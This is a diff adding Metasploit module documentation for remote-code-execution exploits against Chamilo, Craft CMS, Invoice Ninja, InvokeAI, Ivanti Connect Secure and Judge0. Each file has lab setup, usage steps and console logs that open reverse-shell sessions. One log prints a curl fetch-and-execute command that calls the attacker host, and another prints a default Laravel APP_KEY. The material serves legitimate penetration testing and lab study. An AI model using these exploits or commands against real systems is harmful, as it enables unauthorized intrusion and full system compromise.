@@ -0,0 +1,89 @@
+## Vulnerable Application
+Chamilo LMS is a free software e-learning and content management system. In versions prior to <= v1.11.24
+a webshell can be uploaded via the bigload.php endpoint. If the GET request parameter `action` is set to
+`post-unsupported` file extension checks are skipped allowing for attacker controlled .php files to be uploaded to:
+`/main/inc/lib/javascript/bigupload/files/` if the `/files/` directory already exists - it does not exist
+by default.
+
+### Setup
+
+A vulnerable docker-compose configuration can be found at the following link: https://github.com/vulhub/vulhub/pull/559
+1. Clone the repo `git clone https://github.com/vulhub/vulhub.git`
+1. Checkout the pull request mentioned above: `git checkout CVE-2023-4220`
+1. Run `cd vulhub/chamilo/CVE-2023-4220`
+1. Start the environment: `docker compose up`
+1. Navigate to `http://127.0.0.1:8080` to complete the installation wizard.
+1. Note when filling out the database IP address and credentials - the DB hostname is the name of the container which is
+   `mariadb` (not `localhost` or `127.0.0.1`).
+1. Once the installation wizard is complete the target should be ready to be
+   exploited with the module. This container has the non-default `/files/` directory created already.
+
+## Verification Steps
+
+1. Start msfconsole
+1. Do: `use linux/http/chamilo_bigupload_webshell`
+1. Set the `RHOST`, `RPORT`, and `LHSOT` options
+1. Run the module
+1. Receive a Meterpreter session as the `www-data` user.
+
+## Scenarios
+### Chamilo 1.11.18 running in Docker
+```
+msf6 > use linux/http/chamilo_bigupload_webshell
+[*] Using configured payload php/meterpreter/reverse_tcp
+msf6 exploit(linux/http/chamilo_bigupload_webshell) > set rhost 127.0.0.1
+rhost => 127.0.0.1
+msf6 exploit(linux/http/chamilo_bigupload_webshell) > set rport 8080
+rport => 8080
+msf6 exploit(linux/http/chamilo_bigupload_webshell) > set lhost 172.16.199.1
+lhost => 172.16.199.1
+msf6 exploit(linux/http/chamilo_bigupload_webshell) > show options
+
+Module options (exploit/linux/http/chamilo_bigupload_webshell):
+
+   Name     Current Setting  Required  Description
+   ----     ---------------  --------  -----------
+   Proxies                   no        A proxy chain of format type:host:port[,type:host:port][...]
+   RHOSTS   127.0.0.1        yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
+   RPORT    8080             yes       The target port (TCP)
+   SSL      false            no        Negotiate SSL/TLS for outgoing connections
+   VHOST                     no        HTTP server virtual host
+
+
+Payload options (php/meterpreter/reverse_tcp):
+
+   Name   Current Setting  Required  Description
+   ----   ---------------  --------  -----------
+   LHOST  172.16.199.1     yes       The listen address (an interface may be specified)
+   LPORT  4444             yes       The listen port
+
+
+Exploit target:
+
+   Id  Name
+   --  ----
+   0   PHP
+
+
+
+View the full module info with the info, or info -d command.
+
+msf6 exploit(linux/http/chamilo_bigupload_webshell) > run
+
+[*] Started reverse TCP handler on 172.16.199.1:4444
+[*] Running automatic check ("set AutoCheck false" to disable)
+[+] The directory /main/inc/lib/javascript/bigupload/files/ exists on the target indicating the target is vulnerable.
+[+] The target is vulnerable. File upload was successful (CVE-2024-4220 was exploited successfully).
+[*] Sending stage (40004 bytes) to 172.16.199.1
+[+] Deleted 1nZaWHvP
+[+] Deleted kFAqQcbWxs.php
+[*] Meterpreter session 1 opened (172.16.199.1:4444 -> 172.16.199.1:60031) at 2024-11-11 10:42:06 -0800
+
+meterpreter > getuid
+Server username: www-data
+meterpreter > sysinfo
+Computer    : c2064983b0e1
+OS          : Linux c2064983b0e1 6.10.11-linuxkit #1 SMP PREEMPT_DYNAMIC Thu Oct  3 10:19:48 UTC 2024 x86_64
+Meterpreter : php/linux
+meterpreter >
+```
@@ -0,0 +1,275 @@
+## Vulnerable Application
+
+This Metasploit module exploits a Remote Code Execution vulnerability in **Craft CMS**.
+
+The vulnerability lies in improper handling of Twig templates, which can be exploited
+to inject and execute arbitrary PHP code on the server via crafted HTTP requests.
+
+---
+
+### Affected Versions
+
+- **5.x Series**: `>= 5.0.0-RC1`, `< 5.5.2`
+- **4.x Series**: `>= 4.0.0-RC1`, `< 4.13.2`
+- **3.x Series**: `>= 3.0.0`, `< 3.9.14`
+
+---
+
+### Setting Up a Vulnerable Lab
+
+To test this exploit, follow these steps to set up a vulnerable Craft CMS environment.
+
+#### Docker Setup
+
+Install a specific vulnerable version of Craft CMS:
+
+```bash
+mkdir exploit-craft && \
+cd exploit-craft && \
+    # Configure DDEV (https://ddev.com/) project for Craft CMS \
+ddev config \
+  --project-type=craftcms \
+  --docroot=web \
+  --create-docroot \
+  --php-version="8.2" \
+  --database="mysql:8.0" \
+  --nodejs-version="20" && \
+    # Create the DDEV project
+ddev start -y && \
+    # Create Craft CMS with the specified version
+ddev composer create -y --no-scripts --no-interaction "craftcms/craft:5.0.0" && \
+    # Install a vulnerable Craft CMS version
+ddev composer require "craftcms/cms:5.5.0" \
+  --no-scripts \
+  --no-interaction --with-all-dependencies && \
+    # Set the security key for Craft CMS
+ddev craft setup/security-key && \
+    # Install Craft CMS
+ddev craft install/craft \
+    --username=admin \
+    --password=password123 \
+    --email=admin@example.com \
+    --site-name=Testsite \
+    --language=en \
+    --site-url='$DDEV_PRIMARY_URL' && \
+    # Enable register_argc_argv for PHP
+mkdir -p .ddev/php/ && \
+echo "register_argc_argv = On" > .ddev/php/php.ini && \
+ddev restart && \
+    # Launch the project
+echo 'Setup complete. Launching the project.' && \
+ddev launch
+```
+
+---
+
+## Verification Steps
+
+1. Start the vulnerable Craft CMS instance using the steps above.
+2. Launch `msfconsole`.
+3. Use the module: `use exploit/linux/http/craftcms_ftp_template`.
+4. Set `RHOSTS` to the target Craft CMS instance.
+5. Configure additional options (`TARGETURI`, `SSL`, etc.) as needed.
+6. Execute the exploit with the `run` command.
+7. If successful, the module will execute the payload on the target.
+
+---
+
+## Options
+No option
+
+## Scenarios
+
+#### Successful Exploitation Against Craft CMS 5.5.0
+
+**Setup**:
+
+- Local Craft CMS instance with a vulnerable version (e.g., `5.5.0`).
+- Metasploit Framework.
+
+**Steps**:
+
+To successfully exploit the Craft CMS vulnerability using this Metasploit module, follow these steps:
+
+1. Start `msfconsole`:
+```bash
+msfconsole
+```
+
+2. Load the module:
+```bash
+use exploit/linux/http/craftcms_ftp_template
+```
+
+3. Set the `RHOSTS` option to the target Craft CMS instance, for example:
+```bash
+set RHOSTS exploit-craft.ddev.site
+```
+
+4. Configure other necessary options such as `TARGETURI`, `SSL`, and `RPORT` if required. By default:
+   - `RPORT` is set to `80`.
+   - `TARGETURI` is set to `/`.
+
+5. Set the payload for exploitation. For example:
+```bash
+set PAYLOAD cmd/linux/http/x64/meterpreter/reverse_tcp
+```
+
+6. Set the local listener address and port:
+```bash
+set LHOST 192.168.1.36
+set LPORT 4444
+```
+
+7. Optionally, customize FTP-related settings like `SRVPORT` and `FETCH_URIPATH` if needed:
+```bash
+set SRVPORT 9090
+set FETCH_SRVPORT 8081
+set FETCH_URIPATH /custom_payload_path
+```
+
+8. Run the exploit:
+```bash
+exploit
+```
+
+**Expected Results**:
+
+If the target is vulnerable, the module will successfully execute the payload and open a session, such as a Meterpreter shell:
+
+```bash
+msf6 exploit(linux/http/craftcms_ftp_template) > options
+
+Module options (exploit/linux/http/craftcms_ftp_template):
+
+   Name      Current Setting          Required  Description
+   ----      ---------------          --------  -----------
+   PASVPORT  0                        no        The local PASV data port to listen on (0 is random)
+   Proxies                            no        A proxy chain of format type:host:port[,type:host:port][...]
+   RHOSTS    exploit-craft.ddev.site  yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metaspl
+                                                oit.html
+   RPORT     80                       yes       The target port (TCP)
+   SRVHOST   192.168.1.36             yes       The local host or network interface to listen on. This must be an address on the local machine
+                                                 or 0.0.0.0 to listen on all addresses.
+   SRVPORT   9090                     yes       The local port to listen on.
+   SSL       false                    no        Negotiate SSL for incoming connections
+   SSLCert                            no        Path to a custom SSL certificate (default is randomly generated)
+   VHOST                              no        HTTP server virtual host
+
+
+Payload options (cmd/linux/http/x64/meterpreter/reverse_tcp):
+
+   Name                Current Setting  Required  Description
+   ----                ---------------  --------  -----------
+   FETCH_COMMAND       CURL             yes       Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET)
+   FETCH_DELETE        false            yes       Attempt to delete the binary after execution
+   FETCH_FILENAME      QnXFYebbb        no        Name to use on remote system when storing payload; cannot contain spaces or slashes
+   FETCH_SRVHOST                        no        Local IP to use for serving payload
+   FETCH_SRVPORT       8081             yes       Local port to use for serving payload
+   FETCH_URIPATH                        no        Local URI to use for serving payload
+   FETCH_WRITABLE_DIR                   yes       Remote writable dir to store payload; cannot contain spaces
+   LHOST               192.168.1.36     yes       The listen address (an interface may be specified)
+   LPORT               4444             yes       The listen port
+
+
+Exploit target:
+
+   Id  Name
+   --  ----
+   0   Unix/Linux Command Shell
+
+
+
+View the full module info with the info, or info -d command.
+
+msf6 exploit(linux/http/craftcms_ftp_template) > exploit
+[*] Command to run on remote host: curl -so ./jlVAsfWu http://192.168.1.36:8081/LoPlnjEpeOexZNVppn6cAA;chmod +x ./jlVAsfWu;./jlVAsfWu&
+[*] Exploit running as background job 57.
+[*] Exploit completed, but no session was created.
+msf6 exploit(linux/http/craftcms_ftp_template) >
+[*] Fetch handler listening on 192.168.1.36:8081
+[*] HTTP server started
+[*] Adding resource /LoPlnjEpeOexZNVppn6cAA
+[*] Started reverse TCP handler on 192.168.1.36:4444
+[*] Running automatic check ("set AutoCheck false" to disable)
+[*] Performing vulnerability check...
+[+] The target is vulnerable.
+[*] Starting FTP service...
+[*] Started service listener on 192.168.1.36:9090
+[*] FTP server started on 192.168.1.36:9090
+[*] Sending HTTP request to trigger the payload...
+[*] Triggering HTTP request...
+[*] -> 220 FTP Server Ready
+[*] on_client_command_user
+[*] -> 331 Username ok, send password.
+[*] on_client_command_pass
+[*] -> 230 Login successful.
+[*] on_client_command_cwd
+[*] -> 250 "/default" is current directory.
+[*] on_client_command_type
+[*] -> 200 Type set to: Binary.
+[*] on_client_command_size
+[*] -> 550 /default is not retrievable.
+[*] on_client_command_mdtm
+[*] -> 550 /default is not retrievable.
+[*] -> 220 FTP Server Ready
+[*] on_client_command_user
+[*] -> 331 Username ok, send password.
+[*] on_client_command_pass
+[*] -> 230 Login successful.
+[*] on_client_command_cwd
+[*] -> 550 Not a directory
+[*] on_client_command_type
+[*] -> 200 Type set to: Binary.
+[*] on_client_command_size
+[*] -> 213 154
+[*] on_client_command_mdtm
+[*] -> 213 20250110170738
+[*] -> 220 FTP Server Ready
+[*] on_client_command_user
+[*] -> 331 Username ok, send password.
+[*] on_client_command_pass
+[*] -> 230 Login successful.
+[*] on_client_command_cwd
+[*] -> 550 Not a directory
+[*] on_client_command_type
+[*] -> 200 Type set to: Binary.
+[*] on_client_command_size
+[*] -> 213 154
+[*] on_client_command_mdtm
+[*] -> 213 20250110170738
+[*] -> 220 FTP Server Ready
+[*] on_client_command_user
+[*] -> 331 Username ok, send password.
+[*] on_client_command_pass
+[*] -> 230 Login successful.
+[*] on_client_command_type
+[*] -> 200 Type set to: Binary.
+[*] on_client_command_size
+[*] -> 213 154
+[*] on_client_command_epsv
+[*] -> 502 EPSV command not implemented.
+[*] on_client_command_retr
+[*] -> 150 Opening data connection for /default/index.twig
+[*] -> 226 Transfer complete.
+[*] on_client_command_quit
+[*] -> 221 Goodbye.
+[*] Client 172.26.0.2 requested /LoPlnjEpeOexZNVppn6cAA
+[*] Sending payload to 172.26.0.2 (curl/7.88.1)
+[*] Transmitting intermediate stager...(126 bytes)
+[*] Sending stage (3045380 bytes) to 172.26.0.2
+[*] Meterpreter session 14 opened (192.168.1.36:4444 -> 172.26.0.2:59546) at 2025-01-10 17:07:39 +0100
+
+msf6 exploit(linux/http/craftcms_ftp_template) > sessions 14
+[*] Starting interaction with 14...
+meterpreter > sysinfo
+Computer     : 172.26.0.2
+OS           : Debian 12.8 (Linux 5.15.0-130-generic)
+Architecture : x64
+BuildTuple   : x86_64-linux-musl
+Meterpreter  : x64/linux
+meterpreter >
+[*] Waiting for FTP client connections...
+[*] Shutting down FTP service...
+[*] Server stopped.
+```
@@ -0,0 +1,112 @@
+## Vulnerable Application
+Invoice Ninja is a free invoicing software for small businesses, based on the PHP framework Laravel.
+A Remote Code Execution vulnerability in Invoice Ninja (>= `5.8.22` <= `5.10.10`) allows remote unauthenticated
+attackers to conduct PHP deserialization attacks via endpoint `/route/<hash>` which accepts a Laravel
+ciphered value which is unsafe unserialized, if an attacker has access to the secret `APP_KEY`.
+As it allows remote code execution, adversaries could exploit this flaw to execute arbitrary commands,
+potentially resulting in complete system compromise, data exfiltration, or unauthorized access
+to sensitive information.
+
+The following release was tested.
+* Invoice Ninja `5.10.10` on Ubuntu 22.04
+
+## Installation steps to install Invoice Ninja on a self-hosted platform
+`wget https://github.com/invoiceninja/dockerfiles/archive/refs/tags/5.8.22.zip`
+
+`unzip 5.8.22.zip`
+
+`cd dockerfiles-5.8.22`
+
+Replace inside `docker-compose.yml`
+
+FROM `image: invoiceninja/invoiceninja:5` TO `image: invoiceninja/invoiceninja:5.8.22`
+
+Replace in `env`
+`APP_KEY=base64:RR++yx2rJ9kdxbdh3+AmbHLDQu+Q76i++co9Y8ybbno=`
+
+Then, execute `docker-compose up`
+## Verification Steps
+- [ ] Start `msfconsole`
+- [ ] `use exploit/linux/http/linux/http/invoiceninja_uauth_rce_cve_2024_55555`
+- [ ] `set rhosts <ip-target>`
+- [ ] `set rport <port>`
+- [ ] `set lhost <attacker-ip>`
+- [ ] `set target <0=PHP Command, 1=Unix/Linux Command>`
+- [ ] `exploit`
+- [ ] you should get a `reverse shell` or `Meterpreter` session depending on the `payload` and `target` settings
+
+## Options
+### APP_KEY
+This option is required if the BRUTE_FORCE option is not used.
+It is the Laravel APP_KEY with a default key: `base64:RR++yx2rJ9kdxbdh3+AmbHLDQu+Q76i++co9Y8ybbno=`.
+
+### BRUTEFORCE
+This option is optional and is a text file with a list of APP_KEYs, one per line for a bruteforce attack.
+
+## Scenarios
+### Invoice Ninja 5.10.10 on Ubuntu 22.04 -  PHP Command target
+Attack scenario: use the default Laravel APP_KEY preset in the option APP_KEY.
+```msf
+msf6 > use modules/exploits/linux/http/invoiceninja_unauth_rce_cve_2024_55555
+[*] Using configured payload php/meterpreter/reverse_tcp
+msf6 exploit(linux/http/invoiceninja_unauth_rce_cve_2024_55555) > set rhosts 192.168.201.6
+rhosts => 192.168.201.6
+msf6 exploit(linux/http/invoiceninja_unauth_rce_cve_2024_55555) > set lhost 192.168.201.8
+lhost => 192.168.201.8
+msf6 exploit(linux/http/invoiceninja_unauth_rce_cve_2024_55555) > rexploit
+[*] Reloading module...
+[*] Started reverse TCP handler on 192.168.201.8:4444
+[*] Running automatic check ("set AutoCheck false" to disable)
+[*] Checking if 192.168.201.6:443 can be exploited.
+[+] The target appears to be vulnerable. Invoice Ninja 5.10.10
+[*] Lets check if the APP_KEY(s) is/are valid by decrypting the XSRF_TOKEN inside the cookie.
+[*] Grabbing the cookie with the XSRF-TOKEN.
+[+] APP_KEY is valid: base64:RR++yx2rJ9kdxbdh3+AmbHLDQu+Q76i++co9Y8ybbno=
+[+] Unciphered value: e60eab8287b88f834312505e582750ae6f95a84b|6IWTnJv2f3lL1nbKRbl6LwJixPeRF5grQVTFTIuB
+[*] Generate an encrypted serialization payload with our cracked APP_KEY.
+[*] Executing PHP for php/meterpreter/reverse_tcp
+[*] Sending stage (40004 bytes) to 192.168.201.6
+[*] Meterpreter session 1 opened (192.168.201.8:4444 -> 192.168.201.6:60120) at 2025-02-23 09:47:28 +0000
+
+meterpreter > getuid
+Server username: www-data
+meterpreter > sysinfo
+Computer    : cuckoo
+OS          : Linux cuckoo 5.15.0-131-generic #141-Ubuntu SMP Fri Jan 10 21:18:28 UTC 2025 x86_64
+Meterpreter : php/linux
+meterpreter > pwd
+/usr/share/nginx/invoiceninja/public
+meterpreter >
+```
+###  Invoice Ninja 5.10.10 on Ubuntu 22.04 - Unix/Linux Command target
+Attack scenario: use the BRUTEFORCE option with a list of APP_KEYS in a text file.
+```msf
+msf6 exploit(linux/http/invoiceninja_unauth_rce_cve_2024_55555) > set target 1
+target => 1
+msf6 exploit(linux/http/invoiceninja_unauth_rce_cve_2024_55555) > set BRUTEFORCE /root/laravel-crypto-killer/wordlists/invoiceninja_default.txt
+BRUTEFORCE => /root/laravel-crypto-killer/wordlists/invoiceninja_default.txt
+msf6 exploit(linux/http/invoiceninja_unauth_rce_cve_2024_55555) > rexploit
+[*] Reloading module...
+[*] Started reverse TCP handler on 192.168.201.8:4444
+[*] Running automatic check ("set AutoCheck false" to disable)
+[*] Checking if 192.168.201.6:443 can be exploited.
+[+] The target appears to be vulnerable. Invoice Ninja 5.10.10
+[*] Lets check if the APP_KEY(s) is/are valid by decrypting the XSRF_TOKEN inside the cookie.
+[*] Grabbing the cookie with the XSRF-TOKEN.
+[*] Starting bruteforce decryption with APP_KEYS listed in /root/laravel-crypto-killer/wordlists/invoiceninja_default.txt.
+[+] APP_KEY is valid: base64:RR++yx2rJ9kdxbdh3+AmbHLDQu+Q76i++co9Y8ybbno=
+[+] Unciphered value: e60eab8287b88f834312505e582750ae6f95a84b|3epElAO1qNeckBzHOytBrNnGrvRJSyeCBsahBkSO
+[*] Generate an encrypted serialization payload with our cracked APP_KEY.
+[*] Executing Unix/Linux Command for cmd/unix/reverse_bash
+[*] Command shell session 2 opened (192.168.201.8:4444 -> 192.168.201.6:60340) at 2025-02-23 09:49:15 +0000
+
+id
+uid=33(www-data) gid=33(www-data) groups=33(www-data)
+uname -a
+Linux cuckoo 5.15.0-131-generic #141-Ubuntu SMP Fri Jan 10 21:18:28 UTC 2025 x86_64 x86_64 x86_64 GNU/Linux
+pwd
+/usr/share/nginx/invoiceninja/public
+```
+
+## Limitations
+No limitations.
@@ -0,0 +1,141 @@
+## Vulnerable Application
+
+InvokeAI has a critical vulnerability leading to remote code execution
+in the /api/v2/models/install API through unsafe model deserialization.
+The API allows users to specify a model URL, which is downloaded and loaded server-side using torch.load without proper validation.
+This functionality allows attackers to embed malicious code in model files that execute upon loading.
+
+The vulnerability affects:
+
+    * 4.0.0 <= InvokeAI <= 5.4.2
+
+This module was successfully tested on:
+
+    * InvokeAI 5.3.1 installed on Ubuntu 22.04
+
+
+### Installation
+
+Follow the [official instructions](https://invoke-ai.github.io/InvokeAI/installation/manual/#walkthrough)
+
+1. Install uv:
+
+`curl -LsSf https://astral.sh/uv/install.sh | sh`
+
+2. Create a directory for your installation:
+
+```bash
+mkdir ~/invokeai
+cd ~/invokeai
+```
+
+3. Create a virtual environment in that directory:
+
+`uv venv --relocatable --prompt invoke --python 3.11 --python-preference only-managed .venv`
+
+4. Activate the virtual environment:
+
+`source .venv/bin/activate`
+
+5. Install the invokeai package:
+
+```bash
+uv pip install invokeai==5.3.1 --python 3.11 --python-preference only-managed --index=https://download.pytorch.org/whl/cpu --force-reinstall
+```
+
+6. Deactivate and reactivate your venv so that the invokeai-specific commands become available in the environment:
+
+`deactivate && source .venv/bin/activate`
+
+7. Edit ~/invokeai/invoke.yaml:
+
+```yaml
+  # Internal metadata - do not edit:
+  schema_version: 4.0.2
+  
+  # Put user settings here - see https://invoke-ai.github.io/InvokeAI/features/CONFIGURATION/:
+  host: 0.0.0.0 # serve the app on your local network
+```
+
+8. Run the application, specifying the directory you created earlier as the root directory:
+
+`invokeai-web --root ~/invokeai`
+
+
+## Verification Steps
+
+1. Install the application
+2. Start msfconsole
+3. Do: `use exploit/linux/http/invokeai_rce_cve_2024_12029`
+4. Do: `run lhost=<lhost> rhost=<rhost>`
+5. You should get a meterpreter
+
+
+## Options
+
+
+## Scenarios
+```
+msf6 > use exploit/linux/http/invokeai_rce_cve_2024_12029
+[*] No payload configured, defaulting to cmd/linux/http/x64/meterpreter/reverse_tcp
+msf6 exploit(linux/http/invokeai_rce_cve_2024_12029) > options
+
+Module options (exploit/linux/http/invokeai_rce_cve_2024_12029):
+
+   Name     Current Setting  Required  Description
+   ----     ---------------  --------  -----------
+   Proxies                   no        A proxy chain of format type:host:port[,type:host:port][...]
+   RHOSTS                    yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
+   RPORT    9090             yes       The target port (TCP)
+   SRVHOST  0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
+   SSL      false            no        Negotiate SSL/TLS for outgoing connections
+   SSLCert                   no        Path to a custom SSL certificate (default is randomly generated)
+   URIPATH                   no        The URI to use for this exploit (default is random)
+   VHOST                     no        HTTP server virtual host
+
+
+Payload options (cmd/linux/http/x64/meterpreter/reverse_tcp):
+
+   Name                Current Setting  Required  Description
+   ----                ---------------  --------  -----------
+   FETCH_COMMAND       CURL             yes       Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET)
+   FETCH_DELETE        true             yes       Attempt to delete the binary after execution
+   FETCH_FILENAME      CdRqUbPlDQJ      no        Name to use on remote system when storing payload; cannot contain spaces or slashes
+   FETCH_SRVHOST                        no        Local IP to use for serving payload
+   FETCH_SRVPORT       8080             yes       Local port to use for serving payload
+   FETCH_URIPATH                        no        Local URI to use for serving payload
+   FETCH_WRITABLE_DIR                   yes       Remote writable dir to store payload; cannot contain spaces
+   LHOST               192.168.0.12     yes       The listen address (an interface may be specified)
+   LPORT               4444             yes       The listen port
+
+
+Exploit target:
+
+   Id  Name
+   --  ----
+   0   Linux Command
+
+
+
+View the full module info with the info, or info -d command.
+
+msf6 exploit(linux/http/invokeai_rce_cve_2024_12029) > run lhost=192.168.56.1 rhost=192.168.56.17
+[*] Started reverse TCP handler on 192.168.56.1:4444 
+[*] Running automatic check ("set AutoCheck false" to disable)
+[+] The target appears to be vulnerable. Version 5.3.1 detected.
+[*] Using URL: http://192.168.56.1:8081/Z8KmlibT
+[*] Server started.
+[*] Sending stage (3045380 bytes) to 192.168.56.17
+[*] Meterpreter session 1 opened (192.168.56.1:4444 -> 192.168.56.17:48294) at 2025-02-16 15:24:41 +0900
+[*] Server stopped.
+
+meterpreter > getuid
+Server username: ubu
+meterpreter > sysinfo
+Computer     : 192.168.56.17
+OS           : Ubuntu 22.04 (Linux 6.8.0-51-generic)
+Architecture : x64
+BuildTuple   : x86_64-linux-musl
+Meterpreter  : x64/linux
+meterpreter > 
+```
@@ -0,0 +1,114 @@
+## Vulnerable Application
+
+This module exploits a CRLF injection vulnerability in Ivanti Connect Secure to
+achieve remote code execution (CVE-2024-37404). Versions prior to 22.7R2.1 are
+vulnerable. Note that Ivanti Policy Secure versions prior to 22.7R1.1 are also
+vulnerable but this module doesn't support this software.
+
+Valid administrative credentials are required. A non-administrative user is also
+required and can be created using the administrative account, if needed.
+
+Finally, the `Client Log Upload` feature needs to be enabled. This can also
+be done using the administrative interface (see the Installation Steps section
+below), if it is not enabled already.
+
+### Process Overview
+
+First, the module will log into the administrative interface and check if the version
+is vulnerable. Then, it will connect to the user interface using non-privileged
+credentials and upload a log file archive containing the payload. This file is
+stored as a known path on the server, which can be retrieved from the
+administrative interface. Then, it leverages the CRLF vulnerability by creating
+a Certificate Signing Request and passing a specially crafted OpenSSL
+configuration. This configuration instructs OpenSSL to use a custom
+cryptographic engine, which points to the log file path (our payload). The
+payload is immediately executed, giving RCE as the root user on the appliance.
+
+This has been successfully tested against Ivanti Connect Secure version 22.3R1 (build 1647).
+
+### Installation Steps
+Get an Ivanti Security Appliance (ISA) or a Virtual Appliances (ISA-V Series)
+with a vulnerable Ivanti Connect Secure installed.
+
+Note that it is not possible to download a trial version of a Virtual Appliance
+unless you contact sales and request a demo.
+
+Log into to the admin interface (https:/<IP>/admin) to proceed with the following requirements:
+
+#### Create a normal user
+- In the `Authentication` menu, select `Auth. Servers`.
+- Select the `System Local` `Authentication/Authorization Servers` or any
+  server with the type `Local Authentication`. Don't select the
+  `Administrators` server since we need a non-administrative account.
+- Click on the `Users` tab and then `New`.
+- Fill the registration form and click `Save Changes`.
+
+#### Enable Client Log
+- Go to `Users` > `User Roles` and click on the `Users` role.
+- Go to `General` > `Session Options`.
+- Select `Enable Upload Logs` under the `Upload logs` section.
+- Click `Save Changes`.
+
+
+## Verification Steps
+1. Start msfconsole
+1. Do: `use linux/http/ivanti_connect_secure_rce_cve_2024_37404`
+1. Do: `run verbose=true lhost=<local host> rhosts=<remote host> admin_username=<admin username> admin_password=<admin password> username=<normal user> password=<user password>`
+1. You should get a Meterpreter session
+1. Make sure the admin and the normal user have been logged out by logging in
+   the web interfaces with a web browser (you should have any warning saying a
+   session is already active)
+1. Make sure the cleanup has been done correctly by checking `System` > `Log/Monitoring`
+
+
+## Options
+
+### ADMIN_USERNAME
+Administrative username to authenticate with.
+
+### ADMIN_PASSWORD
+Administrator password to authenticate with.
+
+### USERNAME
+Normal user username to authenticate with.
+
+### PASSWORD
+Normal user password to authenticate with.
+
+
+## Scenarios
+
+### Ivanti Connect Secure version 22.3R1 (build 1647)
+
+```
+msf6 exploit(linux/http/ivanti_connect_secure_rce_cve_2024_37404) > run verbose=true lhost=192.168.211.69 rhosts=192.168.211.200 admin_username=msfadmin admin_password=1234567890 username=msfuser password=1234567890
+
+[*] Started reverse TCP handler on 192.168.211.69:4444
+[*] Running automatic check ("set AutoCheck false" to disable)
+[*] Login to the administrative interface with username 'msfadmin' and password '1234567890'...
+[!] The admin msfadmin is already logged in
+[*] Getting the version...
+[+] Found version 22.3R1 (build 1647)
+[+] The target appears to be vulnerable.
+[*] Uploading the payload...
+[*] Login to the user interface with username 'msfuser' and password '1234567890'...
+[*] Uploading the log file...
+[*] Logging the user out...
+[*] Getting the log file name...
+[*] Triggering the payload...
+[*] Transmitting intermediate stager...(106 bytes)
+[*] Sending stage (1017704 bytes) to 192.168.211.200
+[*] Cleaning up...
+[*] Deleting the log file (payload)...
+[*] Logging the administrator out...
+[*] Meterpreter session 3 opened (192.168.211.69:4444 -> 192.168.211.200:50210) at 2024-10-29 16:43:35 +0100
+
+meterpreter > getuid
+Server username: root
+meterpreter > sysinfo
+Computer     : 192.168.211.200
+OS           :  (Linux 4.15.18.34-production)
+Architecture : x64
+BuildTuple   : i486-linux-musl
+Meterpreter  : x86/linux
+```
@@ -0,0 +1,121 @@
+## Vulnerable Application
+
+Judge0 does not account for symlinks placed inside the sandbox directory,
+which can be leveraged by an attacker to write to arbitrary files and gain code execution outside of the sandbox.
+
+The vulnerability affects:
+
+    * Judge0 <= 1.13.0
+
+This module was successfully tested on:
+
+    * Judge0(v1.13.0) installed with Docker on Ubuntu 20.0.4
+
+
+### Installation
+
+1. (Optional) Set cgroup to v1
+```bash
+  sudo nano /etc/default/grub
+  # add this line at the top, and save:
+  GRUB_CMDLINE_LINUX="systemd.unified_cgroup_hierarchy=0"
+  sudo update-grub
+  sudo reboot
+```
+
+2. Install Judge0
+```bash
+  wget https://github.com/judge0/judge0/releases/download/v1.13.0/judge0-v1.13.0.zip
+  unzip judge0-v1.13.0.zip
+  cd judge0-v1.13.0
+```
+
+3. Start Judge0
+```bash
+  docker compose up
+```
+
+4. (Optional) When Judge0 does not work, try this
+```bash
+  docker compose up --force-recreate server
+```
+
+
+## Verification Steps
+
+1. Install the application
+2. Start msfconsole
+3. Do: `use exploit/linux/http/judge0_sandbox_escape_cve_2024_28189`
+4. Do: `run lhost=<lhost> rhost=<rhost>`
+5. You should get a meterpreter
+
+
+## Options
+
+
+## Scenarios
+```
+msf6 > use exploit/linux/http/judge0_sandbox_escape_cve_2024_28189
+[*] Using configured payload cmd/linux/http/x64/meterpreter_reverse_tcp
+msf6 exploit(linux/http/judge0_sandbox_escape_cve_2024_28189) > options
+
+Module options (exploit/linux/http/judge0_sandbox_escape_cve_2024_28189):
+
+   Name     Current Setting  Required  Description
+   ----     ---------------  --------  -----------
+   Proxies                   no        A proxy chain of format type:host:port[,type:host:port][...]
+   RHOSTS                    yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
+   RPORT    2358             yes       The target port (TCP)
+   SSL      false            no        Negotiate SSL/TLS for outgoing connections
+   VHOST                     no        HTTP server virtual host
+
+
+Payload options (cmd/linux/http/x64/meterpreter_reverse_tcp):
+
+   Name                Current Setting  Required  Description
+   ----                ---------------  --------  -----------
+   FETCH_COMMAND       WGET             yes       Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET)
+   FETCH_DELETE        false            yes       Attempt to delete the binary after execution
+   FETCH_FILENAME      JRzyWcrcJ        no        Name to use on remote system when storing payload; cannot contain spaces or slashes
+   FETCH_SRVHOST                        no        Local IP to use for serving payload
+   FETCH_SRVPORT       8080             yes       Local port to use for serving payload
+   FETCH_URIPATH                        no        Local URI to use for serving payload
+   FETCH_WRITABLE_DIR                   yes       Remote writable dir to store payload; cannot contain spaces
+   LHOST                                yes       The listen address (an interface may be specified)
+   LPORT               4444             yes       The listen port
+
+
+Exploit target:
+
+   Id  Name
+   --  ----
+   0   Linux Command
+
+
+
+View the full module info with the info, or info -d command.
+
+msf6 exploit(linux/http/judge0_sandbox_escape_cve_2024_28189) > run lhost=192.168.56.1 rhost=192.168.56.15
+
+[*] Started reverse TCP handler on 192.168.56.1:4444 
+[*] Running automatic check ("set AutoCheck false" to disable)
+[*] Version 1.13.0 detected, which is vulnerable
+[+] The target appears to be vulnerable.
+[*] Writing cron job to /etc/cron.d/dUTuziNy
+[*] Use language: 77, COBOL (GnuCOBOL 2.2)
+[+] Deleted /etc/cron.d/dUTuziNy
+[+] Deleted /root/SVENuNNy
+[*] Meterpreter session 1 opened (192.168.56.1:4444 -> 192.168.56.15:49024) at 2024-10-29 12:56:04 +0900
+
+meterpreter > getuid
+Server username: root
+meterpreter > sysinfo
+Computer     : 172.18.0.5
+OS           : Debian 10.2 (Linux 5.4.0-196-generic)
+Architecture : x64
+BuildTuple   : x86_64-linux-musl
+Meterpreter  : x64/linux
+meterpreter > pwd
